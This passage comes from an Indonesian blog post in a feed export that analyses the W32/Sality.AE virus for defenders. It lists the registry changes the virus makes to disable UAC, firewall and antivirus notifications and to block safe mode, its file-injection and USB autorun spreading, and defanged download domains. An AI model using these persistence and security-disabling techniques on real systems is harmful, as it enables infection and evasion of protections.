style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;     &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;XCOMM&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Selain mematikan proses antivirus di atas, ia juga akan berupaya untuk blok agar user tidak dapat mengakses web dari beberapa antivirus berikut:&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Cureit &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Drweb &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Onlinescan &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Spywareinfo &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Ewido &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Virusscan &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Windowsecurity &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Spywareguide &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Bitdefender &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Panda software &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Agnmitum &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Virustotal &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Sophos &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Trend Micro &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Etrust.com &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Symantec &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;McAfee &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;F-Secure &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Eset.com &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Kaspersky&lt;/span&gt;&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;W32/Sality.AE juga akan mencoba untuk merubah regisrty berikut:&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet  Setting\"GlobalUserOffline" = "0" &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"EnableLUA"  = "0"&lt;/span&gt;&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;ul&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xxx  [xxx adalah acak, contoh : abp470n5]&lt;/span&gt;&lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_CURRENT_USER\Software\[USER  NAME]914 &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WMI_MFC_TPSHOKER_80  &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPFILTERDRIVER&lt;/span&gt;&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Selain itu ia juga akan mencoba untuk merubah beberapa string registry Windows Firewall  berikut dengan menambahkan value dari 0 menjadi 1:&lt;/span&gt;&lt;/p&gt;   &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;AntiVirusDisableNotify &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;AntiVirusOverride &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;FirewallDisableNotify&lt;/span&gt;&lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;FirewallOverride &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;UacDisableNotify &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;UpdatesDisableNotify &lt;/span&gt;  &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;dan membuat key “SVC” serta string berikut dengan value 1&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;AntiVirusDisableNotify &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;AntiVirusOverride &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;FirewallDisableNotify&lt;/span&gt;&lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;FirewallOverride &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;UacDisableNotify&lt;/span&gt;&lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;UpdatesDisableNotify  &lt;/span&gt;  &lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Tak cuma itu W32/s\Sality.AE juga akan menghapus key “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ALG”.&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;&lt;span style="font-weight: normal;"&gt;ALG atau Application Layer Gateway Service adalah services yang m&lt;/span&gt;emberikan support untuk plug-in protokol aplikasi dan meng-enable konektivitas jaringan / protokol. Service ini boleh saja dimatikan. Dampaknya adalah program seperti MSN Messenger dan Windows Messenger tidak akan berfungsi. Service ini bisa dijalankan, tetapi hanya jika menggunakan firewall, baik firewall bawaan Windows atau firewall lain. Jika tidak komputer yang terinfeksi virus ini akan mengalami celah keamanan yang serius. &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; font-weight: normal; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;&lt;b&gt;Blok akses “safe mode”&lt;/b&gt;&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Dalam rangka “mempertahankan” dirinya, W32/Sality.AE juga akan mencoba untuk blok akses ke mode “safe mode” sehingga user tidak dapat booting pada mode “safe mode” dengan menghapus key yang berada di lokasi di bawah ini :&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot  &lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot&lt;/span&gt;&lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot&lt;/span&gt;&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;&lt;b&gt;Injeksi file exe/com/scr&lt;/b&gt;&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Tujuan utama dari virus ini adalah mencoba untuk menginjeksi program instalasi dan file yang mempunyai ekstensi exe/com/scr yang ada di drive C - Y terutama file hasil instalasi (file yang berada di direktori C:\Program Files&lt;span style="color:#000000;"&gt;&lt;span style="font-style: normal;"&gt;&lt;span style="text-decoration: none;"&gt;) dan file-file portable (file yang langsung dapat dijalankan tanpa perlu instal)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, ia juga akan menginfeksi file yang mempunyai ekstensi “.exe” yang terdapat dalam list registry berikut sehingga memungkinkan virus dapat aktif secara otomatis setiap kali komputer dinyalakan.&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;em&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;&lt;span style="font-style: normal;"&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run&lt;/span&gt;&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;em&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;&lt;span style="font-style: normal;"&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/span&gt;&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache&lt;/span&gt;&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;File yang berhasil di injeksi biasanya ukurannya akan bertambah sekitar 68 - 80 KB dari ukuran semula. Program yang telah terinfeksi ini akan tetap dapat di jalankan seperti biasa sehingga user tidak curiga bahwa file tersebut sebenarnya telah di infeksi oleh W32/Sality.AE. Salah satu kecanggihan Sality adalah kemampuannya menginjeksi file tumpangannya sehingga ukuran file bervirus tidak seragam, jelas lebih sulit diidentifikasi dibandingkan virus lain yang menggantikan file yang ada sehingga ukuran filenya akan sama besar.&lt;/span&gt;&lt;/p&gt;   &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Harap berhati-hati, tidak semua program antivirus dapat membersihkan file yang sudah terinfeksi W32/Sality.AE, bisa-bisa file tersebut akan rusak setelah di scan dan di bersihkan oleh antivirus tersebut.&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Tidak mau kalah dengan virus mancanegara lain, untuk memperlancar aksinya ia akan mencoba untuk melakukan koneksi ke sejumlah alamat web yang sudah ditentukan dengan tujuan untuk memanggil/mendownload trojan/virus lainnya yang di sinyalir merupakan varian dari versi sebelumnya yang memungkinkan virus ini dapat mengupdate dirinya.&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]pedmeo222nb.info &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]pzrk.ru &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]technican.w.interia.pl &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]www.kjwre9fqwieluoi.info &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]bpowqbvcfds677.info &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]bmakemegood24.com &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]bperfectchoice1.com &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]bcash-ddt.net &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]bddr-cash.net &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]btrn-cash.net &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]bmoney-frn.net &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]bclr-cash.net &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]bxxxl-cash.net &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]balsfhkewo7i487fksd.info &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]buynvf96.info &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]89.119.67.154/tes[xxx] &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]oceaninfo.co.kr/picas[xxx] &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]kukutrustnet777.info/home[xxx] &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]kukutrustnet888.info/home[xxx]  &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]kukutrustnet987.info/home[xxx]  &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]kukutrustnet777.info &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]www.kjwre9fqwieluoi.info &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;[http://]kjwre77638dfqwieuoi.info&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;http://mattfoll.eu.interia.pl/[sensor] &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;http://st1.dist.su.lt/l[sensor]&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;http://lpbmx.ru/[sensor] &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;http://bjerm.mass.hc.ru/[sensor] &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;http://SOSiTE_AVERI_SOSiTEEE.[sensor]&lt;/span&gt;&lt;br /&gt;  &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;&lt;b&gt;Mengeksploitasi Default Share dan Full Sharing&lt;/b&gt;&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;W32/Sality.AE akan menyebar dengan cepat melalui jaringan dengan memanfaatkkan default share windows atau share folder yang mempunyai akses full dengan cara menginfeksi file yang mempunyai ekstensi exe/com/scr. Karena itu, Vaksincom menyarankan pengguna komputer untuk menonaktifkan Default Share (C$, D$ .. dst) dan hindari Full Sharing folder anda di jaringan.&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Selain menyebar dengan menggunakan jaringan, ia juga akan memanfaatkan flash disk yakni dengan cara kopi dirinya dengan nama file acak dengan ekstensi  exe/cmd/pif serta membuat file autorun.inf agar dirinya dapat aktif secara otomatis tanpa harus menjalankan file yang sudah terinfeksi virus, selain itu ia juga akan menginfeksi file yang mempunyai ekstensi exe/com/scr yang terdapat dalam flash disk tersebut.&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8177802711873346685-7855031634254891440?l=rinaldojonathan.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rinaldojonathan.blogspot.com/feeds/7855031634254891440/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/w32salityae.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/7855031634254891440'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8177802711873346685/posts/default/7855031634254891440'/><link rel='alternate' type='text/html' href='http://rinaldojonathan.blogspot.com/2009/10/w32salityae.html' title='W32/Sality.AE'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 